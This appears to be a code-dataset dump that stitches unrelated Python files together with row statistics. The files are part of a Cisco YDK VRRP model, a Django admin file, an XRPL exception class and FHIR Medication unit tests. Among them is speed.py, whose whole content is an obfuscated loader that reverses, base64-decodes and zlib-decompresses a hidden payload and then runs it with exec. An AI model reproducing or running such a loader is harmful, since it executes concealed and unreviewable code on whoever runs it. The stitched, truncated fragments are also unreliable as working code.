('reason', (YLeaf(YType.enumeration, 'reason'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpStateChangeReason', '')])),
])
self.old_state = None
self.new_state = None
self.reason = None
self.time = Vrrp.Ipv4.VirtualRouters.VirtualRouter.StateChangeHistory.Time()
self.time.parent = self
self._children_name_map["time"] = "time"
self._segment_path = lambda: "state-change-history"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv4.VirtualRouters.VirtualRouter.StateChangeHistory, ['old_state', 'new_state', 'reason'], name, value)
class Time(_Entity_):
"""
Time of state change
.. attribute:: seconds
Seconds
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: second
.. attribute:: nanoseconds
Nanoseconds
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: nanosecond
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv4.VirtualRouters.VirtualRouter.StateChangeHistory.Time, self).__init__()
self.yang_name = "time"
self.yang_parent_name = "state-change-history"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('seconds', (YLeaf(YType.uint32, 'seconds'), ['int'])),
('nanoseconds', (YLeaf(YType.uint32, 'nanoseconds'), ['int'])),
])
self.seconds = None
self.nanoseconds = None
self._segment_path = lambda: "time"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv4.VirtualRouters.VirtualRouter.StateChangeHistory.Time, ['seconds', 'nanoseconds'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv4.VirtualRouters.VirtualRouter.StateChangeHistory.Time']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv4.VirtualRouters.VirtualRouter.StateChangeHistory']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv4.VirtualRouters.VirtualRouter']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv4.VirtualRouters']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv4']['meta_info']
class MgoSessions(_Entity_):
"""
VRRP MGO Session information
.. attribute:: mgo_session
A VRRP MGO Session
**type**\: list of :py:class:`MgoSession <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.MgoSessions.MgoSession>`
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.MgoSessions, self).__init__()
self.yang_name = "mgo-sessions"
self.yang_parent_name = "vrrp"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("mgo-session", ("mgo_session", Vrrp.MgoSessions.MgoSession))])
self._leafs = OrderedDict()
self.mgo_session = YList(self)
self._segment_path = lambda: "mgo-sessions"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.MgoSessions, [], name, value)
class MgoSession(_Entity_):
"""
A VRRP MGO Session
.. attribute:: session_name (key)
The name of the session
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: primary_session_name
Session Name
**type**\: str
**length:** 0..16
**config**\: False
.. attribute:: primary_session_interface
Interface of primary session
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
**config**\: False
.. attribute:: primary_af_name
Address family of primary session
**type**\: :py:class:`VrrpBAf <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpBAf>`
**config**\: False
.. attribute:: primary_session_number
VRID of primary session
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: primary_session_state
State of primary session
**type**\: :py:class:`VrrpBagProtocolState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpBagProtocolState>`
**config**\: False
.. attribute:: slave
List of slaves following this primary session
**type**\: list of :py:class:`Slave <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.MgoSessions.MgoSession.Slave>`
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.MgoSessions.MgoSession, self).__init__()
self.yang_name = "mgo-session"
self.yang_parent_name = "mgo-sessions"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['session_name']
self._child_classes = OrderedDict([("slave", ("slave", Vrrp.MgoSessions.MgoSession.Slave))])
self._leafs = OrderedDict([
('session_name', (YLeaf(YType.str, 'session-name'), ['str'])),
('primary_session_name', (YLeaf(YType.str, 'primary-session-name'), ['str'])),
('primary_session_interface', (YLeaf(YType.str, 'primary-session-interface'), ['str'])),
('primary_af_name', (YLeaf(YType.enumeration, 'primary-af-name'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpBAf', '')])),
('primary_session_number', (YLeaf(YType.uint32, 'primary-session-number'), ['int'])),
('primary_session_state', (YLeaf(YType.enumeration, 'primary-session-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpBagProtocolState', '')])),
])
self.session_name = None
self.primary_session_name = None
self.primary_session_interface = None
self.primary_af_name = None
self.primary_session_number = None
self.primary_session_state = None
self.slave = YList(self)
self._segment_path = lambda: "mgo-session" + "[session-name='" + str(self.session_name) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/mgo-sessions/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.MgoSessions.MgoSession, ['session_name', 'primary_session_name', 'primary_session_interface', 'primary_af_name', 'primary_session_number', 'primary_session_state'], name, value)
class Slave(_Entity_):
"""
List of slaves following this primary session
.. attribute:: slave_interface
Interface of slave
**type**\: str
**length:** 0..64
**config**\: False
.. attribute:: slave_virtual_router_id
VRID of slave
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.MgoSessions.MgoSession.Slave, self).__init__()
self.yang_name = "slave"
self.yang_parent_name = "mgo-session"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('slave_interface', (YLeaf(YType.str, 'slave-interface'), ['str'])),
('slave_virtual_router_id', (YLeaf(YType.uint32, 'slave-virtual-router-id'), ['int'])),
])
self.slave_interface = None
self.slave_virtual_router_id = None
self._segment_path = lambda: "slave"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.MgoSessions.MgoSession.Slave, ['slave_interface', 'slave_virtual_router_id'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.MgoSessions.MgoSession.Slave']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.MgoSessions.MgoSession']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.MgoSessions']['meta_info']
def clone_ptr(self):
self._top_entity = Vrrp()
return self._top_entity
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp']['meta_info']
| 41.355305 | 1,737 | 0.466894 | 17,301 | 194,494 | 4.964858 | 0.019421 | 0.037394 | 0.028523 | 0.025426 | 0.924992 | 0.897144 | 0.878343 | 0.862743 | 0.8489 | 0.842521 | 0 | 0.03772 | 0.413056 | 194,494 | 4,702 | 1,738 | 41.3641 | 0.714726 | 0.296595 | 0 | 0.769494 | 0 | 0.002736 | 0.229189 | 0.112699 | 0.002736 | 0 | 0 | 0 | 0 | 1 | 0.073187 | false | 0 | 0.032832 | 0 | 0.184679 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
aeffc39ba4336e6d623a2023586327998475d7ab | 3407 | py | Python | speed.py | Bajingan-Z/SPEED | 83868115ee3a55e0cfdc516093774cf47b2171eb | ["Apache-2.0"] | 1 | 2022-03-05T20:12:21.000Z | 2022-03-05T20:12:21.000Z | speed.py | Bajingan-Z/SPEED | 83868115ee3a55e0cfdc516093774cf47b2171eb | ["Apache-2.0"] | null | null | null | speed.py | Bajingan-Z/SPEED | 83868115ee3a55e0cfdc516093774cf47b2171eb | [
"Apache-2.0"
] | 4 | 2022-02-10T10:05:02.000Z | 2022-03-27T23:44:47.000Z | _ = lambda __ : __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]));exec((_)(b'=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'))
| 1,703.5 | 3,406 | 0.954505 | 123 | 3,407 | 26.325203 | 0.98374 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16554 | 0.001761 | 3,407 | 1 | 3,407 | 3,407 | 0.786533 | 0 | 0 | 0 | 0 | 1 | 0.972703 | 0.969768 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 9 |
9dcbf86429ae73bf923dac9fad5624b1d329c9bc | 135 | py | Python | backend/apps/blogs/admin.py | hovedstyret/indok-web | 598e9ca0b5f3a5e776a85dec0a8694b9bcd5a159 | ["MIT"] | 3 | 2021-11-18T09:29:14.000Z | 2022-01-13T20:12:11.000Z | backend/apps/blogs/admin.py | rubberdok/indok-web | 598e9ca0b5f3a5e776a85dec0a8694b9bcd5a159 | ["MIT"] | 277 | 2022-01-17T18:16:44.000Z | 2022-03-31T19:44:04.000Z | backend/apps/blogs/admin.py | hovedstyret/indok-web | 598e9ca0b5f3a5e776a85dec0a8694b9bcd5a159 | ["MIT"] | null | null | null | from django.contrib import admin
from apps.blogs.models import Blog, BlogPost
admin.site.register(BlogPost)
admin.site.register(Blog)
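`admin.site.register(...)` in the file above adds each model to a site-wide registry; Django raises if the same model is registered twice. A tiny self-contained mimic of that registry behavior (`MiniAdminSite` is a stand-in for illustration, not Django's implementation):

```python
class AlreadyRegistered(Exception):
    """Raised on duplicate registration, as Django's admin site does."""


class MiniAdminSite:
    """Tiny stand-in for django.contrib.admin.site: a model registry."""

    def __init__(self):
        self._registry = {}

    def register(self, model):
        if model in self._registry:
            raise AlreadyRegistered(model.__name__)
        self._registry[model] = object()  # placeholder for a ModelAdmin


site = MiniAdminSite()

class Blog: pass
class BlogPost: pass

site.register(BlogPost)
site.register(Blog)
assert Blog in site._registry and BlogPost in site._registry
```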
d182afd7d895c554ab6406efa840dce58ed0fa58 | 254 | py | Python | synapse/vendor/xrpl/core/addresscodec/exceptions.py | vishalbelsare/synapse | c0f0d318cc5d3098b3a8d80222e2b0b1d19c5740 | ["Apache-2.0"] | 216 | 2017-01-17T18:52:50.000Z | 2022-03-31T18:44:49.000Z | synapse/vendor/xrpl/core/addresscodec/exceptions.py | vishalbelsare/synapse | c0f0d318cc5d3098b3a8d80222e2b0b1d19c5740 | ["Apache-2.0"] | 2189 | 2017-01-17T22:31:48.000Z | 2022-03-31T20:41:45.000Z | synapse/vendor/xrpl/core/addresscodec/exceptions.py | vishalbelsare/synapse | c0f0d318cc5d3098b3a8d80222e2b0b1d19c5740 | ["Apache-2.0"] | 44 | 2017-01-17T16:50:57.000Z | 2022-03-16T18:35:52.000Z | """General XRPL Address Codec Exceptions."""
# It has been modified for vendored imports.
from synapse.vendor.xrpl.constants import XRPLException
class XRPLAddressCodecException(XRPLException):
"""General XRPL Address Codec Exception."""
pass
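The point of the subclass in the module above is that callers can catch address-codec errors narrowly, or all library errors via the shared `XRPLException` base. A sketch with stand-in classes (the exception names mirror the module but are redefined here rather than imported, and `decode_classic_address` is a hypothetical decoder used only for illustration):

```python
class XRPLException(Exception):
    """Stand-in for the library-wide base exception."""


class XRPLAddressCodecException(XRPLException):
    """Stand-in for the address-codec-specific exception."""


def decode_classic_address(addr: str) -> bytes:
    # hypothetical decoder: reject obviously invalid input
    if not addr.startswith("r"):
        raise XRPLAddressCodecException("invalid classic address")
    return addr.encode()


# A broad except on the base class still catches the codec error.
try:
    decode_classic_address("not-an-address")
except XRPLException as exc:
    assert isinstance(exc, XRPLAddressCodecException)
```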
d1aebc2b7c68c32be2d1da2424b8325cd766716a | 20755 | py | Python | fhir/resources/tests/test_medication.py | cstoltze/fhir.resources | 52f99738935b7313089d89daf94d73ce7d167c9d | ["BSD-3-Clause"] | 144 | 2019-05-08T14:24:43.000Z | 2022-03-30T02:37:11.000Z | fhir/resources/tests/test_medication.py | cstoltze/fhir.resources | 52f99738935b7313089d89daf94d73ce7d167c9d | ["BSD-3-Clause"] | 82 | 2019-05-13T17:43:13.000Z | 2022-03-30T16:45:17.000Z | fhir/resources/tests/test_medication.py | cstoltze/fhir.resources | 52f99738935b7313089d89daf94d73ce7d167c9d | ["BSD-3-Clause"] | 48 | 2019-04-04T14:14:53.000Z | 2022-03-30T06:07:31.000Z | # -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/Medication
Release: R4
Version: 4.0.1
Build ID: 9346c8cc45
Last updated: 2019-11-01T09:29:23.356+11:00
"""
from pydantic.validators import bytes_validator # noqa: F401
from .. import fhirtypes # noqa: F401
from .. import medication
def impl_medication_1(inst):
assert inst.batch.expirationDate == fhirtypes.DateTime.validate(
"2019-10-31T11:15:33+10:00"
)
assert inst.batch.lotNumber == "12345"
assert inst.code.coding[0].code == "0169-7501-11"
assert inst.code.coding[0].display == "Novolog 100u/ml"
assert inst.code.coding[0].system == "http://hl7.org/fhir/sid/ndc"
assert inst.contained[0].id == "org3"
assert inst.form.coding[0].code == "385219001"
assert inst.form.coding[0].display == "Injection solution (qualifier value)"
assert inst.form.coding[0].system == "http://snomed.info/sct"
assert inst.id == "med0307"
assert inst.ingredient[0].itemCodeableConcept.coding[0].code == "325072002"
assert (
inst.ingredient[0].itemCodeableConcept.coding[0].display
== "Insulin Aspart (substance)"
)
assert (
inst.ingredient[0].itemCodeableConcept.coding[0].system
== "http://snomed.info/sct"
)
assert inst.ingredient[0].strength.denominator.code == "mL"
assert inst.ingredient[0].strength.denominator.system == "http://unitsofmeasure.org"
assert float(inst.ingredient[0].strength.denominator.value) == float(1)
assert inst.ingredient[0].strength.numerator.code == "U"
assert inst.ingredient[0].strength.numerator.system == "http://unitsofmeasure.org"
assert float(inst.ingredient[0].strength.numerator.value) == float(100)
assert inst.manufacturer.reference == "#org3"
assert inst.meta.tag[0].code == "HTEST"
assert inst.meta.tag[0].display == "test health data"
assert (
inst.meta.tag[0].system == "http://terminology.hl7.org/CodeSystem/v3-ActReason"
)
assert inst.text.status == "generated"
def test_medication_1(base_settings):
"""No. 1 tests collection for Medication.
Test File: medicationexample0307.json
"""
filename = base_settings["unittest_data_dir"] / "medicationexample0307.json"
inst = medication.Medication.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Medication" == inst.resource_type
impl_medication_1(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "Medication" == data["resourceType"]
inst2 = medication.Medication(**data)
impl_medication_1(inst2)
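The "testing reverse" step above (dump the parsed model with `.dict()`, rebuild a second instance from the mapping, re-run the same assertions) is a generic round-trip pattern. With a plain dataclass stand-in (`Batch` here is hypothetical, not the FHIR model) it reduces to:

```python
from dataclasses import dataclass, asdict


@dataclass
class Batch:
    # hypothetical stand-in for a parsed resource fragment
    lotNumber: str


def impl_batch(inst):
    assert inst.lotNumber == "12345"


inst = Batch(lotNumber="12345")
impl_batch(inst)

# round trip: dump to a plain dict, rebuild, assert again
data = asdict(inst)
inst2 = Batch(**data)
impl_batch(inst2)
```

If serialization dropped or renamed a field, the second `impl_batch` call would fail, which is exactly what the generated tests are checking.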
def impl_medication_2(inst):
assert inst.code.coding[0].code == "373994007"
assert inst.code.coding[0].display == "Prednisone 5mg tablet (Product)"
assert inst.code.coding[0].system == "http://snomed.info/sct"
assert inst.contained[0].id == "sub03"
assert inst.form.coding[0].code == "385055001"
assert inst.form.coding[0].display == "Tablet dose form (qualifier value)"
assert inst.form.coding[0].system == "http://snomed.info/sct"
assert inst.id == "med0311"
assert inst.ingredient[0].itemReference.reference == "#sub03"
assert inst.ingredient[0].strength.denominator.code == "TAB"
assert (
inst.ingredient[0].strength.denominator.system
== "http://terminology.hl7.org/CodeSystem/v3-orderableDrugForm"
)
assert float(inst.ingredient[0].strength.denominator.value) == float(1)
assert inst.ingredient[0].strength.numerator.code == "mg"
assert inst.ingredient[0].strength.numerator.system == "http://unitsofmeasure.org"
assert float(inst.ingredient[0].strength.numerator.value) == float(5)
assert inst.meta.tag[0].code == "HTEST"
assert inst.meta.tag[0].display == "test health data"
assert (
inst.meta.tag[0].system == "http://terminology.hl7.org/CodeSystem/v3-ActReason"
)
assert inst.text.status == "generated"
def test_medication_2(base_settings):
"""No. 2 tests collection for Medication.
Test File: medicationexample0311.json
"""
filename = base_settings["unittest_data_dir"] / "medicationexample0311.json"
inst = medication.Medication.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Medication" == inst.resource_type
impl_medication_2(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "Medication" == data["resourceType"]
inst2 = medication.Medication(**data)
impl_medication_2(inst2)
def impl_medication_3(inst):
assert inst.code.coding[0].code == "430127000"
assert inst.code.coding[0].display == "Oral Form Oxycodone (product)"
assert inst.code.coding[0].system == "http://snomed.info/sct"
assert inst.contained[0].id == "sub03"
assert inst.form.coding[0].code == "385055001"
assert inst.form.coding[0].display == "Tablet dose form (qualifier value)"
assert inst.form.coding[0].system == "http://snomed.info/sct"
assert inst.id == "med0310"
assert inst.ingredient[0].itemReference.reference == "#sub03"
assert inst.ingredient[0].strength.denominator.code == "TAB"
assert (
inst.ingredient[0].strength.denominator.system
== "http://terminology.hl7.org/CodeSystem/v3-orderableDrugForm"
)
assert float(inst.ingredient[0].strength.denominator.value) == float(1)
assert inst.ingredient[0].strength.numerator.code == "mg"
assert inst.ingredient[0].strength.numerator.system == "http://unitsofmeasure.org"
assert float(inst.ingredient[0].strength.numerator.value) == float(5)
assert inst.meta.tag[0].code == "HTEST"
assert inst.meta.tag[0].display == "test health data"
assert (
inst.meta.tag[0].system == "http://terminology.hl7.org/CodeSystem/v3-ActReason"
)
assert inst.text.status == "generated"
def test_medication_3(base_settings):
"""No. 3 tests collection for Medication.
Test File: medicationexample0310.json
"""
filename = base_settings["unittest_data_dir"] / "medicationexample0310.json"
inst = medication.Medication.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Medication" == inst.resource_type
impl_medication_3(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "Medication" == data["resourceType"]
inst2 = medication.Medication(**data)
impl_medication_3(inst2)
def impl_medication_4(inst):
assert inst.batch.expirationDate == fhirtypes.DateTime.validate(
"2019-10-31T11:15:33+10:00"
)
assert inst.batch.lotNumber == "12345"
assert inst.code.coding[0].code == "51144-050-01"
assert inst.code.coding[0].display == "Adcetris"
assert inst.code.coding[0].system == "http://hl7.org/fhir/sid/ndc"
assert inst.contained[0].id == "org3"
assert inst.form.coding[0].code == "421637006"
assert inst.form.coding[0].display == (
"Lyophilized powder for injectable solution (qualifier value)" " "
)
assert inst.form.coding[0].system == "http://snomed.info/sct"
assert inst.id == "med0306"
assert inst.manufacturer.reference == "#org3"
assert inst.meta.tag[0].code == "HTEST"
assert inst.meta.tag[0].display == "test health data"
assert (
inst.meta.tag[0].system == "http://terminology.hl7.org/CodeSystem/v3-ActReason"
)
assert inst.text.status == "generated"
def test_medication_4(base_settings):
"""No. 4 tests collection for Medication.
Test File: medicationexample0306.json
"""
filename = base_settings["unittest_data_dir"] / "medicationexample0306.json"
inst = medication.Medication.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Medication" == inst.resource_type
impl_medication_4(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "Medication" == data["resourceType"]
inst2 = medication.Medication(**data)
impl_medication_4(inst2)
def impl_medication_5(inst):
assert inst.batch.expirationDate == fhirtypes.DateTime.validate(
"2017-05-22T11:15:33+10:00"
)
assert inst.batch.lotNumber == "9494788"
assert inst.code.coding[0].code == "0069-2587-10"
assert (
inst.code.coding[0].display
== "Vancomycin Hydrochloride (VANCOMYCIN HYDROCHLORIDE)"
)
assert inst.code.coding[0].system == "http://hl7.org/fhir/sid/ndc"
assert inst.contained[0].id == "org4"
assert inst.form.coding[0].code == "385219001"
assert inst.form.coding[0].display == "Injection Solution (qualifier value)"
assert inst.form.coding[0].system == "http://snomed.info/sct"
assert inst.id == "med0301"
assert inst.ingredient[0].isActive is True
assert inst.ingredient[0].itemCodeableConcept.coding[0].code == "66955"
assert (
inst.ingredient[0].itemCodeableConcept.coding[0].display
== "Vancomycin Hydrochloride"
)
assert (
inst.ingredient[0].itemCodeableConcept.coding[0].system
== "http://www.nlm.nih.gov/research/umls/rxnorm"
)
assert inst.ingredient[0].strength.denominator.code == "mL"
assert inst.ingredient[0].strength.denominator.system == "http://unitsofmeasure.org"
assert float(inst.ingredient[0].strength.denominator.value) == float(10)
assert inst.ingredient[0].strength.numerator.code == "mg"
assert inst.ingredient[0].strength.numerator.system == "http://unitsofmeasure.org"
assert float(inst.ingredient[0].strength.numerator.value) == float(500)
assert inst.manufacturer.reference == "#org4"
assert inst.meta.tag[0].code == "HTEST"
assert inst.meta.tag[0].display == "test health data"
assert (
inst.meta.tag[0].system == "http://terminology.hl7.org/CodeSystem/v3-ActReason"
)
assert inst.status == "active"
assert inst.text.status == "generated"
def test_medication_5(base_settings):
"""No. 5 tests collection for Medication.
Test File: medicationexample0301.json
"""
filename = base_settings["unittest_data_dir"] / "medicationexample0301.json"
inst = medication.Medication.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Medication" == inst.resource_type
impl_medication_5(inst)
# testing reverse by generating data from itself and create again.
